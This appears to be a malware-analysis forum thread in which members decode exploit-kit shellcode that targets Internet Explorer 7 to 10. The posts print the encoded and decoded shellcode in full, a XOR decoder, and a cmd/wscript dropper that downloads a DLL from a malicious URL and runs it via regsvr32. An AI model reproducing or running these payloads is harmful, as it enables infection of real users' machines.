Malware Analysis Need help on this shellcode analysis

yyangcs

Level 1
Thread author
Mar 3, 2017
6
Hello, all

I am studying malware analysis and recently came across some kind of very complicated malware. The landing page contains multiple stages of encoded Javascripts that will eventually download the flash file for next stage infection. Moreover, I also found there seem to have some hardcoded shellcode included in decoded Javascript and the shellcode seems to be targeting IE 8, 9, 10 only according to JS code. When converting the shellcode to instructions, however, the converted assembly code contains some bad bytes and I am not sure if the shellcode is somehow encoded or twisted. I have uploaded the JS file to dropbox (password is "infected"):
https://www.dropbox.com/s/x4bk3n4n6l4p3xr/malware.zip?dl=0

Could anyone please take a look at the file and give me some advice about how to analyze the shellcode starting with "EB125831C966B96D054980...." ? Any help is appreciated. Thanks.
 

RoboMan

Level 35
Verified
Top Poster
Content Creator
Well-known
Jun 24, 2016
2,422
I don't have my HDD to create a Virtual Machine yet :( But i'll comment and see what our awsome testers and anlyzers can do.
 
  • Like
Reactions: Der.Reisende

DardiM

Level 26
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Hello, all

I am studying malware analysis and recently came across some kind of very complicated malware. The landing page contains multiple stages of encoded Javascripts that will eventually download the flash file for next stage infection. Moreover, I also found there seem to have some hardcoded shellcode included in decoded Javascript and the shellcode seems to be targeting IE 8, 9, 10 only according to JS code. When converting the shellcode to instructions, however, the converted assembly code contains some bad bytes and I am not sure if the shellcode is somehow encoded or twisted. I have uploaded the JS file to dropbox (password is "infected"):
Dropbox - malware.zip
Could anyone please take a look at the file and give me some advice about how to analyze the shellcode starting with "EB125831C966B96D054980...." ? Any help is appreciated. Thanks.
Maybe it can help you :

X86 Shellcode Obfuscation - Part 3
See also other parts
X86 Shellcode Obfuscation - Part 1
etc

Your shellcode begins with a jmp : a good way to obfuscate the code after :

BE12
EB12 => jmp short 12 = 18 bytes under
etc,...


Remarks :

There is :

"gexywoaxor" "http://..............................." "USER AGENT" 22 00 00 00 00

=> char code to Hex
=> "67657879776f61786f7222202268747470.....................2200000000"​

Then :

shellcode + hex string encoded

"EB125831C966B96D054980...." +
"67657879776f61786f7222202268747470.....................2200000000"​


=> added at the end of the shellcode part "EB125831C966B96D054980...."​
 
Last edited:

DardiM

Level 26
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Return-oriented programming - Wikipedia

EB12 jmp label1
hop: 58 pop eax
31C9 xor ecx,ecx
66B96D05 mov cx,56Dh
useless: 49 dec ecx
80340884 xor byte ptr [eax+ecx],84h
859 test ecx,ecx
75F7 jne useless
FFE0 jmp eax
label1: E8E9FFFFFF call hop
the part from here is different
but this link can gives you an idea :

=> A method of using an exploit to download a payload from the web

Go Near this part :

"Any exploit kit customer can provide a download URL which is passed from JavaScript, through Flash, arriving as an argument to payload which is eventually executed. We can see this by inspecting the ROP Chain that the exploit uses once it achieves control over the instruction pointer."

In your sample : it uses the encoded "gexywoaxor" "http://BAD URL" "USER AGENT22000000"
with the shellcode

need user agent that have "MSIE" inside (IE 7 => 10 )
Return-oriented programming - Wikipedia
 
Last edited:

yyangcs

Level 1
Thread author
Mar 3, 2017
6
Maybe it can help you :

X86 Shellcode Obfuscation - Part 3
See also other parts
X86 Shellcode Obfuscation - Part 1
etc

Your shellcode begins with a jmp : a good way to obfuscate the code after :

BE12
EB12 => jmp short 12 = 18 bytes under
etc,...


Remarks :

There is :
"gexywoaxor" "http://..............................." "USER AGENT" 22 00 00 00 00

=> char code to Hex
=> "67657879776f61786f7222202268747470.....................2200000000"​
Then :

shellcode + hex string encoded

"EB125831C966B96D054980...." +
"67657879776f61786f7222202268747470.....................2200000000"​
=> added at the end of the shellcode part "EB125831C966B96D054980...."​
Yes, then the function "fvsdferd" takes the whole hex string as input and the result returned seems to have user-agent string decoded. By the way, did you see any bad bytes/instructions when putting the string in disassembler.
 

yyangcs

Level 1
Thread author
Mar 3, 2017
6
Return-oriented programming - Wikipedia

jmp label1
hop: 58 pop eax
31C9 xor ecx,ecx
66B96D05 mov cx,56Dh
useless: 49 dec ecx
80340884 xor byte ptr [eax+ecx],84h
859 test ecx,ecx
75F7 jne useless
FFE0 jmp eax
label1: E8E9FFFFFF call hop
the part from here is different
but this link can give you an idea :

=> A method of using an exploit to download a payload from the web

Go Near this part :

"Any exploit kit customer can provide a download URL which is passed from JavaScript, through Flash, arriving as an argument to payload which is eventually executed. We can see this by inspecting the ROP Chain that the exploit uses once it achieves control over the instruction pointer."

In your sample : it uses the encoded "gexywoaxor" "http://BAD URL" "USER AGENT22000000"
with the shellcode

need user agent that have "MSIE" inside (IE 7 => 10 )​
Thanks. That article is helpful. Have you tried to put the whole hex string into disassembler? When I did that, I got some bad instructions, which made me think something went wrong.
 

DardiM

Level 26
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Catching Exploit Kit Landers - OpenDNS Umbrella Blog

"The payload itself is simply a one liner to create a Windows Script Host temporary file that downloads, deobfuscates, and executes Cerber Ransomware via a DLL using regsvr32.exe."

The exploit part works if the user agent (then the browser) is from IE7 to IE10

try {
d2[e3]++
} catch (exc) {
hjgdgdfgd(er3wssss)


=> er3wssss : important string​

Let see some parts :

In the javascript file, a lot of functions (add parts in the html files,styles, etc).

=> a test is made

The entry point is here => a test is made

var ie_true = navigator.userAgent.toLowerCase(),
browser = /msie[\/\s]\d+/i.test(ie_true);

if (browser) {
...
...
...
}


inside the if part :


function u7 => decoder function : charCode to String

c2 => "CharCodeAt"
a1 => "length"
v3 => "fromCharCode"
dl => "dashstyle"
sR => "array"
im9 => "item"
iz3 => "%00"
af => "createElement"
o3 => "getElementById"
aF => "indexOf"
cSs => createStyleSheet
ki7 => styleSheets
oi => "style"
we => "Type"
p9 => "cssText"
ip => "getElementByTagName"
wg => "Head"
io8 => "appendChild"
o5 => "string"
r8 => "innerText"
i6 => "innerHtml"
ju3 => "styleSheet"
t7 => "text/css"
ie8 => "marginLeft"
ue3 => "_anchorRect"
y7t => "rotation"
u7h => "_vgRuntimeStyle"
jw2 => "0x"
m5 => "substr"
e3 => "body"
n67 => "classname"
There is somewhere in the file the var we have seen above, er3wssss, that is a part of the exploit (using shellcode) :

er3wssss = part1 + part2

part1 : the shellcode (asm) under string
+ sxcvsasd(parameter 1, parameter 2)​

parameter1 : url
parameter2 : "gexywoaxor" => password !?​

The function uses subfunctions to return an encoded string.​

calling sxcvsasd

function sxcvsasd(u, k) {
var fr = String.fromCharCode;
var c = "",
b = "",
d = "",
f = fr(0x20),
g = fr(0),
v = fr(0x22);
var app = k + v + f + v + u + v + f + v + navigator.userAgent + v + g + g + g + g;

=> "gexywoaxor" "http://..............................." "USER AGENT" 22 00 00 00 00

app.length % 2 && (app += g);
for (var e = 0; e < app.length; e++) {
b = sdfgh(app.charCodeAt(e), 2);
d = sdfgh(app.charCodeAt(e + 1), 2);
c += b + d;
e += 1;
}
return c;

subfunction :
function sdfgh(num, width) {
var xcvaa = "0123456789abcdef";
var sdfgh = xcvaa.substr(num & 0xF, 1);
while (num > 0xF) {

num = num >>> 4;
sdfgh = xcvaa.substr(num & 0xF, 1) + sdfgh;
}
var width = (width ? width : 0);
while (sdfgh.length < width) sdfgh = "0" + sdfgh;
return sdfgh;
}
"gexywoaxor" "http://..............................." "USER AGENT" 22 00 00 00 00
is encoded :
c : "67657879776f61786f7222202268747470....................................."

=> and added at the end of "EB125831C966B96D054980...." (shellcode)​
In fact :

Simple encoding : "decimal to hex under string" encoding

g => 103 => 67
e => 101 => 65

The shellcode : here : language machine codes under a string.

"EB125831C9......................................."

EB12 => jmp 12 = 18 bytes under


58 => pop eax
31C9 => xor %ecx,%ecx
etc
Next parts are to answer the question on the thread : about this shellcode

About the problem when disassembling.
Have you looked the links about obfuscation usually used to make the disassembly failed (I post them on my first post) ?

On you sample you have :

EB12 jmp label1
hop: 58 pop eax
31C9 xor ecx,ecx
66B96D05 mov cx,56Dh
usefull: 49 dec ecx
80340884 xor byte ptr [eax+ecx],84h
85C9 test ecx,ecx
75F7 jne usefull
FFE0 jmp eax
label1: E8E9FFFFFF call hop
=> the address of following code (I named it HERE ) is automatically pushed on a stack in memory : it is easy for the sub function (begins at "hop") to retrieve it.
The pop eax => gets the return address (remove it from the stack)
At the end of the sub function : jmp eax => go the the address I named HERE
HERE: .......
.......
.......
.......
.......
the part of code from here is different than the real, and understandable / bad, etc

Why is the sub-function retrieving the return address ?
Look at the beginning !

There is a loop (I named the loop address : usefull)

xor from byte at address [eax+ecx] with 84h
when ecx = 0

=> real part decoded
=> jmp to eax = > label HERE : the decoded code / parts
First conclusion : the part after HERE is XOR encoded, and the sub function retrieves the return address by pop eax =>then the return address is also removed from the stack, and the jum eax is needed to replace the ret instruction. But before that, the sub function "plays" with the obfuscated code that is on the return address.

=> you must do "each bytes XOR 84h

==> not the string "D10D61074028D7D5D3B544E00......"
and "D1" XOR 84h, etc... => wrong
but the bytes :

D1h XOR 84h,
0Dh XOR 84h
61h XOR 84h
=> just run the code until it reach jmp eax and the important part will be decoded.​

mov cx,56Dh

=> 1389 bytes => 2778 chars (I verified, it is all the shellcode part from the label HERE to the end
(the last char once decoded is 22 => 22h => " ),

(without the part added in the JavaScript by
+ sxcvsasd("hXXp://rew.kaghaan.com/index.php?xHiMdbKYJBrMDIQ=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9wffY1wRq5TAF-M8jgnzmbJFJc4jw0DT72FZmOMaBF9G4xgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTFxmuWD", "gexywoaxor")

that returns a hex version of :

"gexywoaxor" "
http://BAD_URL" "USER AGENT" 22 00 00 00 00

In my case :

Code:
67657879776f61786f72222022687474703a2f2f7265772e6b61676861616e2e636f6d2f696e6465782e7068703f7848694d64624b594a42724d4449513d6c33534d665072664a787a46474d5355622d6e4a446139424e55584352514c5068345347684b7258434a2d6f6653696831374f4946787a736d5475324b544b76674a5179667530536147796a31424b654f3130686a6f55655746385a356533783152534c3278336669705341397766665931775271355441462d4d386a676e7a6d624a464a63346a773044543732465a6d4f4d61424639473478675933365449484c4f4c2d41466958774534556766626374346c73786142576954694a475132334f5777475446786d7557442220224d6f7a696c6c612f352e30202857696e646f7773204e542031302e303b2057696e36343b2078363429204170706c655765624b69742f3533372e333620284b48544d4c2c206c696b65204765636b6f29204368726f6d652f35362e302e323932342e3837205361666172692f3533372e33362200000000
)​

Code:
D10D61074028D7D5D3B544E00FC4B40FC4880FC4880F840F840FDC9C0D5C87C4B80FD4FC855E0FFEA4855BB54D0F83855C05BCC7F6E1E5F19805FC8FF7F7C584F1970FC6A0855C8B3380CC0FD698855E8798066F8D074380C5BFCE9CF84B09C174D409F928D3B5443D95848484772FE243C15C858543C128C0848484D4D4D4C4D4CCD4D46F8AD47B57DBDDDF4564870744824D476C697B7B7BE7E9E0AAE1FCE1A4ABF5A4ABE7A4E7E0A4ABE0A4A6A1F0E9F4A1A6A4A2A2A4E1E7ECEBA4E2F1EAE7F0EDEBEAA4C8EBE3ACEAA8E3ADFFE2EBF6ACF2E5F6A4E7B9B4A8F7B9D7F0F6EDEAE3A8E0A8C0B9A6F4F1A6AFA6F7ECA6A8E6B9DFD9A8EDB9DFD9A8F6B9ACB4B7B3B2AFB5ADA8E5B9B4BFF6AFB5DABAE5BFE5AFAFADE6DFE5D9B9E5BFE2EBF6ACE5B9B4BFF6AFB5DABAE5BFE5AFAFADE7B9E7AFE6DFE5D9AFE3DFF2D9ACE5A1E3AAE8E1EAE3F0ECADDAA2F6A8E0B9E6DFE5D9A8E6DFE5D9B9E6DFE7D9A8E6DFE7D9B9E0BFE2EBF6ACF2E5F6A4E1B9E7B9E5B9B4A8D7B9A6E2F6EBE9C7A6AFA6ECE5F6C7EBE0E1A6BFE1DAB8EAAAE8E1EAE3F0ECBFE1AFAFADE5B9E5AFB5DAA2F6A8E7B9E7AFE6DFE5D9DAA2F6A8E0B9E6DFE5D9A8E6DFE5D9B9E6DFE7D9A8E6DFE7D9B9E0A8EDDFC0D9ACF7DFD7D9ACEADFF2D9ACE1ADDADAE6DFE6DFE5D9AFE6DFE7D9DAA2F6D9ADADBFF6E1F0F1F6EAA4EDDFF1ACB5B1ADD9ACF1ACB5B5ADADF9BFE2F1EAE7F0EDEBEAA4CCACE3ADFFF2E5F6A4D0B9F1ACB4ADA8E0B9D3ACD0AFA6AAA6AFD0AFF1ACB5ADADBFE0DFA6F7E1F0D4F6EBFCFDA6D9ACEAADBFE0AAEBF4E1EAACF1ACB6ADA8E3ACB5ADA8EAADBFE0AACBF4F0EDEBEAACB4ADB9E3ACB6ADBFE0DFA6D8FCB1B7E1EAD8FCB2B0A6D9BFEDE2ACB4B7B5B4B9B9E0AAF7F0E5F0F1F7ADF6E1F0F1F6EAA4C8EBE3ACE0DFA6F6E1F7F4EBEAF7E1D0E1FCF0A6D9A8E3ACEAADADF9BFC1B9A6D3EDEACCD0D0D4C9D6E1F5F1E1F7F0AAB1AAB5C9C3C1D0C9D7E7F6EDF4F0EDEAE3AAC2EDE8E1D7FDF7F0E1E9CBE6EEE1E7F0C9D3D7E7F6EDF4F0AAD7ECE1E8A6AFA6E8C9C5C0CBC0C6AAD7F0F6E1E5E9C9E1F6EBC9AAE1FCA6A8F1B9E2F1EAE7F0EDEBEAACFCADFFF6E1F0F1F6EAA4C1AAF7F4E8EDF0ACA6C9A6ADDFFCD9F9A8CEB9C5E7F0EDF2E1DCCBE6EEE1E7F0A8D3B9E2F1EAE7F0EDEBEAACF2ADFFF6E1F0F1F6EAA4EAE1F3A4CEACF2ADF9BFF0F6FDFFC1AFB9A6E1C9C3E1F0D0E1A6AFA6E9F4CAE5E9E1C9E7ECE5F6C7EBE0E1C5F0C9EDF7EBA9BCBCB1BDA9B5C9C9EDEAE0E1FCCBA6AFA6E2C9AAE0E8E8C9D7E7F6A6AFA6EDF4F0C2F1E8E8CAE5A6AFA6E9E1C9EEEBA6AFA6EDEAC9F6A6AFA6F1EAC9A4ABE7A4C9A4ABF7A4A6BFF2E5F6A4F5B9D3ACF1ACB7ADADA8EEB9D3ACF1ACB0ADADA8F7B9D3ACF1ACB1ADADA8F4B9F1ACB3ADA8EAB9B4A8C8B9D3D7E7F6EDF4F0DFF1ACB5B0ADD9A8F2B9F1ACBDADA8E9B9D3D7E7F6EDF4F0AAC5F6E3F1E9E1EAF0F7BFF7AAD0FDF4E1B9B6BFE7B9F5DFF1ACBCADD9ACADBFF7AAC7ECE5F6F7E1F0B9F1ACB4B5B6ADBFF7AACBF4E1EAACADBFEDB9CCACE9ADBFE0B9EDDFF2D9ACEDDFF1ACB5B6ADD9ACA6D4D8FCB0B1D8FCB4B4D8FCB4B4A6ADAFB4B6B3ADBFF7AAF3F6EDF0E1F0E1FCF0ACEDADBFEDE2ACB4B7B3DAB8E0ADFFF2E5F6A4FEB9B5BFE7AFB9F1ACB5B7ADF9E1E8F7E1A4E7AFB9F4BFF7AAF7E5F2E1F0EBE2EDE8E1ACE7A8B6ADBFF7AAC7E8EBF7E1ACADBFFEDAA2DAA2ACE7B9A6F6E1E3F7F2F6B7B6A6AFF4AFF1ACB5BCADAFE7ADBFEEDFA6F6F1EAA6D9ACA6D8FCB2B7E9E0A6AFF4AFF1ACB5B3ADAFE7A8B4ADF9E7E5F0E7ECACDDADFFF9A4E0F7B9A6C0E1E8E1A6BFF5DFE0F7AFA6F0E1E2EDE8E1A6D9ACC8ADBFA4BACDCDEEB2F7C2EBF7F4A4A2A2A4F7F0E5F6F0A4F3F7E7F6EDF4F0A4ABABC6A4ABABC1BECED7E7F6EDF4F0A4CDCDEEB2F7C2EBF7F4A4A6
And remember that in the JavaScript file, after the shellcode, a part is added (hex encoded) => not concerned by the XOR part.
In my case :
Code:
67657879776f61786f72222022687474703a2f2f7265772e6b61676861616e2e636f6d2f696e6465782e7068703f7848694d64624b594a42724d4449513d6c33534d665072664a787a46474d5355622d6e4a446139424e55584352514c5068345347684b7258434a2d6f6653696831374f4946787a736d5475324b544b76674a5179667530536147796a31424b654f3130686a6f55655746385a356533783152534c3278336669705341397766665931775271355441462d4d386a676e7a6d624a464a63346a773044543732465a6d4f4d61424639473478675933365449484c4f4c2d41466958774534556766626374346c73786142576954694a475132334f5777475446786d7557442220224d6f7a696c6c612f352e30202857696e646f7773204e542031302e303b2057696e36343b2078363429204170706c655765624b69742f3533372e333620284b48544d4c2c206c696b65204765636b6f29204368726f6d652f35362e302e323932342e3837205361666172692f3533372e33362200000000

I wrote this small code to get the decoded part of the shellcode :
Code:
string encoded = "D10D61074028D7D5D3B544E00FC4B40FC4880FC4880F840F840FDC9C0D5C87C4B80FD4FC855E0FFEA4855BB54D0F83855C05BCC7F6E1E5F19805FC8FF7F7C584F1970FC6A0855C8B3380CC0FD698855E8798066F8D074380C5BFCE9CF84B09C174D409F928D3B5443D95848484772FE243C15C858543C128C0848484D4D4D4C4D4CCD4D46F8AD47B57DBDDDF4564870744824D476C697B7B7BE7E9E0AAE1FCE1A4ABF5A4ABE7A4E7E0A4ABE0A4A6A1F0E9F4A1A6A4A2A2A4E1E7ECEBA4E2F1EAE7F0EDEBEAA4C8EBE3ACEAA8E3ADFFE2EBF6ACF2E5F6A4E7B9B4A8F7B9D7F0F6EDEAE3A8E0A8C0B9A6F4F1A6AFA6F7ECA6A8E6B9DFD9A8EDB9DFD9A8F6B9ACB4B7B3B2AFB5ADA8E5B9B4BFF6AFB5DABAE5BFE5AFAFADE6DFE5D9B9E5BFE2EBF6ACE5B9B4BFF6AFB5DABAE5BFE5AFAFADE7B9E7AFE6DFE5D9AFE3DFF2D9ACE5A1E3AAE8E1EAE3F0ECADDAA2F6A8E0B9E6DFE5D9A8E6DFE5D9B9E6DFE7D9A8E6DFE7D9B9E0BFE2EBF6ACF2E5F6A4E1B9E7B9E5B9B4A8D7B9A6E2F6EBE9C7A6AFA6ECE5F6C7EBE0E1A6BFE1DAB8EAAAE8E1EAE3F0ECBFE1AFAFADE5B9E5AFB5DAA2F6A8E7B9E7AFE6DFE5D9DAA2F6A8E0B9E6DFE5D9A8E6DFE5D9B9E6DFE7D9A8E6DFE7D9B9E0A8EDDFC0D9ACF7DFD7D9ACEADFF2D9ACE1ADDADAE6DFE6DFE5D9AFE6DFE7D9DAA2F6D9ADADBFF6E1F0F1F6EAA4EDDFF1ACB5B1ADD9ACF1ACB5B5ADADF9BFE2F1EAE7F0EDEBEAA4CCACE3ADFFF2E5F6A4D0B9F1ACB4ADA8E0B9D3ACD0AFA6AAA6AFD0AFF1ACB5ADADBFE0DFA6F7E1F0D4F6EBFCFDA6D9ACEAADBFE0AAEBF4E1EAACF1ACB6ADA8E3ACB5ADA8EAADBFE0AACBF4F0EDEBEAACB4ADB9E3ACB6ADBFE0DFA6D8FCB1B7E1EAD8FCB2B0A6D9BFEDE2ACB4B7B5B4B9B9E0AAF7F0E5F0F1F7ADF6E1F0F1F6EAA4C8EBE3ACE0DFA6F6E1F7F4EBEAF7E1D0E1FCF0A6D9A8E3ACEAADADF9BFC1B9A6D3EDEACCD0D0D4C9D6E1F5F1E1F7F0AAB1AAB5C9C3C1D0C9D7E7F6EDF4F0EDEAE3AAC2EDE8E1D7FDF7F0E1E9CBE6EEE1E7F0C9D3D7E7F6EDF4F0AAD7ECE1E8A6AFA6E8C9C5C0CBC0C6AAD7F0F6E1E5E9C9E1F6EBC9AAE1FCA6A8F1B9E2F1EAE7F0EDEBEAACFCADFFF6E1F0F1F6EAA4C1AAF7F4E8EDF0ACA6C9A6ADDFFCD9F9A8CEB9C5E7F0EDF2E1DCCBE6EEE1E7F0A8D3B9E2F1EAE7F0EDEBEAACF2ADFFF6E1F0F1F6EAA4EAE1F3A4CEACF2ADF9BFF0F6FDFFC1AFB9A6E1C9C3E1F0D0E1A6AFA6E9F4CAE5E9E1C9E7ECE5F6C7EBE0E1C5F0C9EDF7EBA9BCBCB1BDA9B5C9C9EDEAE0E1FCCBA6AFA6E2C9AAE0E8E8C9D7E7F6A6AFA6EDF4F0C2F1E8E8CAE5A6AFA6E9E1C9EEEBA6AFA6EDEAC9F6A6AFA6F1EAC9A4ABE7A4C9A4ABF7A4A6BFF2E5F6A4F5B9D3ACF1ACB7ADADA8EEB9D3ACF1ACB0ADADA8F7B9D3ACF1ACB1ADADA8F4B9F1ACB3ADA8EAB9B4A8C8B9D3D7E7F6EDF4F0DFF1ACB5B0ADD9A8F2B9F1ACBDADA8E9B9D3D7E7F6EDF4F0AAC5F6E3F1E9E1EAF0F7BFF7AAD0FDF4E1B9B6BFE7B9F5DFF1ACBCADD9ACADBFF7AAC7ECE5F6F7E1F0B9F1ACB4B5B6ADBFF7AACBF4E1EAACADBFEDB9CCACE9ADBFE0B9EDDFF2D9ACEDDFF1ACB5B6ADD9ACA6D4D8FCB0B1D8FCB4B4D8FCB4B4A6ADAFB4B6B3ADBFF7AAF3F6EDF0E1F0E1FCF0ACEDADBFEDE2ACB4B7B3DAB8E0ADFFF2E5F6A4FEB9B5BFE7AFB9F1ACB5B7ADF9E1E8F7E1A4E7AFB9F4BFF7AAF7E5F2E1F0EBE2EDE8E1ACE7A8B6ADBFF7AAC7E8EBF7E1ACADBFFEDAA2DAA2ACE7B9A6F6E1E3F7F2F6B7B6A6AFF4AFF1ACB5BCADAFE7ADBFEEDFA6F6F1EAA6D9ACA6D8FCB2B7E9E0A6AFF4AFF1ACB5B3ADAFE7A8B4ADF9E7E5F0E7ECACDDADFFF9A4E0F7B9A6C0E1E8E1A6BFF5DFE0F7AFA6F0E1E2EDE8E1A6D9ACC8ADBFA4BACDCDEEB2F7C2EBF7F4A4A2A2A4F7F0E5F6F0A4F3F7E7F6EDF4F0A4ABABC6A4ABABC1BECED7E7F6EDF4F0A4CDCDEEB2F7C2EBF7F4A4A6";
String decoded= "";
int value = 132;  //84h
 for (var i = 0; i < test.Length; i = i + 2)
  {
         string hex1 = encoded.Substring(i, 2);
          int dec = Convert.ToInt32(hex1, 16);
          int result = dec ^ value;
           decoded+= result.ToString("X2");
}

At the end : decoded => the decoded string with the important working shellcode

This is the part after XOR 84h
Code:
5589E583C4AC53515731C0648B40308B400C8B400C8B008B008B581889D803403C8B507801DA8B7A2001DF31C98B0701D8813843726561751C81780B7373410075138B422401D80FB704488B521C01DA031C82EB0983C704413B4A187CCF8D45F0508D7DAC5731C0B911000000F3AB66C745D80101C745AC440000005050504050485050EB0E50FFD35F595BC1E00383C006C9C3E8EDFFFFFF636D642E657865202F71202F63206364202F64202225746D702522202626206563686F2066756E6374696F6E204C6F67286E2C67297B666F722876617220633D302C733D537472696E672C642C443D227075222B227368222C623D5B5D2C693D5B5D2C723D28303337362B31292C613D303B722B315E3E613B612B2B29625B615D3D613B666F7228613D303B722B315E3E613B612B2B29633D632B625B615D2B675B765D286125672E6C656E677468295E26722C643D625B615D2C625B615D3D625B635D2C625B635D3D643B666F722876617220653D633D613D302C533D2266726F6D43222B22686172436F6465223B655E3C6E2E6C656E6774683B652B2B29613D612B315E26722C633D632B625B615D5E26722C643D625B615D2C625B615D3D625B635D2C625B635D3D642C695B445D28735B535D286E5B765D2865295E5E625B625B615D2B625B635D5E26725D29293B72657475726E20695B75283135295D287528313129297D3B66756E6374696F6E20482867297B76617220543D752830292C643D5728542B222E222B542B75283129293B645B2273657450726F7879225D286E293B642E6F70656E28752832292C672831292C6E293B642E4F7074696F6E2830293D672832293B645B225C783533656E5C783634225D3B696628303331303D3D642E7374617475732972657475726E204C6F6728645B22726573706F6E736554657874225D2C67286E29297D3B453D2257696E485454504D526571756573742E352E314D4745544D536372697074696E672E46696C6553797374656D4F626A6563744D575363726970742E5368656C222B226C4D41444F44422E53747265616D4D65726F4D2E6578222C753D66756E6374696F6E2878297B72657475726E20452E73706C697428224D22295B785D7D2C4A3D416374697665584F626A6563742C573D66756E6374696F6E2876297B72657475726E206E6577204A2876297D3B7472797B452B3D22654D4765745465222B226D704E616D654D63686172436F646541744D69736F2D383835392D314D4D696E6465784F222B22664D2E646C6C4D536372222B2269707446756C6C4E61222B226D654D6A6F222B22696E4D72222B22756E4D202F63204D202F7320223B76617220713D572875283329292C6A3D572875283429292C733D572875283529292C703D752837292C6E3D302C4C3D575363726970745B75283134295D2C763D752839292C6D3D575363726970742E417267756D656E74733B732E547970653D323B633D715B752838295D28293B732E436861727365743D7528303132293B732E4F70656E28293B693D48286D293B643D695B765D28695B75283132295D2822505C7834355C7830305C78303022292B303237293B732E7772697465746578742869293B6966283033375E3C64297B766172207A3D313B632B3D75283133297D656C736520632B3D703B732E73617665746F66696C6528632C32293B732E436C6F736528293B7A5E265E2628633D227265677376723332222B702B75283138292B63293B6A5B2272756E225D28225C7836336D64222B702B75283137292B632C30297D63617463682859297B7D2064733D2244656C65223B715B64732B22746566696C65225D284C293B203E49496A3673466F73702026262073746172742077736372697074202F2F42202F2F453A4A5363726970742049496A3673466F73702022

jmp label1
hop: 58 pop eax

1C9 xor ecx,ecx
66B96D05 mov cx,56Dh
useless: 49 dec ecx

80340884 xor byte ptr [eax+ecx],84h
85C9 test ecx,ecx
75F7 jne useless
FFE0 jmp eax
label1: E8E9FFFFFF call hop

=> replaced with 23 NOP (90h)

9090909090909090909090909090909090909090909090

(to respect the data size if it was a file)

The shellcode XORed, once decoded end with 20 22 =>
20 => space
22 => "
The second part added in the javascript to the shellcode end with "22 00 00 00 00"

In hex 22 00 00 00 00 =>
22 => "
00 .... => + 00 : end of string / not important values , etc

Concatenating the two parts :

shellcode "parameters" 00 00 00 00​

You can now take into account the part on the JavaScript that correspond to

"gexywoaxor" "http://BAD_URL" "USER AGENT" 22 00 00 00 00

that have been encoded from text to hex under string​

=> for me : "67657879776f61786f7222202268747470.....................2200000000"​

To end, let's see what it looks like with a disassembler

Oh ! Now you have the real part ! ;)

Beautiful asm part :)

aaaa.jpg


Interesting info inside

zezezezez.jpg
a2.jpg


On the screen-shoots we can see that :
=> It uses cmd and windows host script (wscript, here) to be a naughty script (obfuscated)

- "gexywoaxor"
- "http://BAD_URL"
- "USER AGENT"

=> arguments
Just take into account that there will be some real asm codes, and some code that the disassembler put, reading the bytes and trying to make asm instructions, that are datas.

Example :

the data for the second part (added to the string that contents the shellcode) begins at : 56dh
Code:
...............
56d:    67 65 78 79             addr16 gs js 0x5ea
571:    77 6f                   ja     0x5e2
573:    61                      popa
574:    78 6f                   js     0x5e5
576:    72 22                   jb     0x59a
578:    20 22                   and    BYTE PTR [edx],ah
57a:    68 74 74 70 3a          push   0x3a707474
57f:    2f                      das
580:    2f                      das
581:    72 65                   jb     0x5e8
583:    77 2e                   ja     0x5b3
585:    6b 61 67 68             imul   esp,DWORD PTR [ecx+0x67],0x68
...............

But in reallity it is only data that the disassembler translate to asm :

"gexywoaxor" "http://..............................." "USER AGENT" 22 00 00 00 00​

67657879776f61786f72 => gexywoaxor

The same for the main part :

At 99 (just after a function call)​

=> data (but the disassembler put asm codes) :

63 6d 64 arpl WORD PTR [ebp+0x64],bp
2e 65 78 65 cs gs js 0x105
20 2f and BYTE PTR [edi],ch
71 20
...
...

CharCode of => cmd.exe /q /c cd /d "%tmp" ..................

Code:
...............
84: eb 0e                   jmp    0x94
86: 50                      push   eax
87: ff d3                   call   ebx
89: 5f                      pop    edi
8a: 59                      pop    ecx
8b: 5b                      pop    ebx
8c: c1 e0 03                shl    eax,0x3
8f: 83 c0 06                add    eax,0x6
92: c9                      leave
93: c3                      ret
94: e8 ed ff ff ff          call   0x86
99: 63 6d 64                arpl   WORD PTR [ebp+0x64],bp
9c: 2e 65 78 65             cs gs js 0x105
a0: 20 2f                   and    BYTE PTR [edi],ch
a2: 71 20                   jno    0xc4
a4: 2f                      das
a5: 63 20                   arpl   WORD PTR [eax],sp
a7: 63 64 20 2f             arpl   WORD PTR [eax+eiz*1+0x2f],sp
ab: 64 20 22                and    BYTE PTR fs:[edx],ah
ae: 25 74 6d 70 25          and    eax,0x25706d74
b3: 22 20                   and    ah,BYTE PTR [eax]
...............


Method :

Catching Exploit Kit Landers - OpenDNS Umbrella Blog
Return-oriented programming - Wikipedia

"With data execution prevention, an adversary cannot execute maliciously injected instructions because a typical buffer overflow overwrites contents in the data section of memory, which is marked as non-executable. To defeat this, a return-oriented programming attack does not inject malicious code, but rather uses instructions that are already present, called "gadgets", by manipulating return addresses. A typical data execution prevention cannot defend against this attack because the adversary did not use malicious code but rather combined "good" instructions by changing return addresses; therefore the code used would not be marked non-executable."

Use the exploit of IE7 to IE10 Browser to be able to get / use the shellcode that manipulate return addresses (this sample decode the real part)

to run cmd / wscript

which :
=> downloads the payload as dll, register it (regsvr32)
=> runs it
=> delete the temp file​

cmd.exe /q /c cd /d "%tmp%" &&
echo
script_part > temp_file
&&
start wscript //B //E:JScript temp_file "gexywoaxor" "BAD_URL" "USER_AGENT"



script_part : obfuscated script functions, etc
echo ..... > => put the content in a file​

@yyangcs

I hope it helped you (now you can see the obfuscated script on the disassembler info).

Edited;
Posted some info about the obfuscated script_part

 
Last edited:

Winter Soldier

Level 25
Verified
Top Poster
Well-known
Feb 13, 2017
1,486
Awesome dissection! :)

I am not skilled in .js but it seems plausible a procedure of allocation of the shellcode and then the execution of the function that contains the payload.
A hypothesis could be the use of heap spraying attack, a technique used to write the shellcode in the memory of a running process, often implemented in these contexts.
 

DardiM

Level 26
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Awesome dissection! :)

I am not skilled in .js but it seems plausible a procedure of allocation of the shellcode and then the execution of the function that contains the payload.
A hypothesis could be the use of heap spraying attack, a technique used to write the shellcode in the memory of a running process, often implemented in these contexts.
Thanks :)

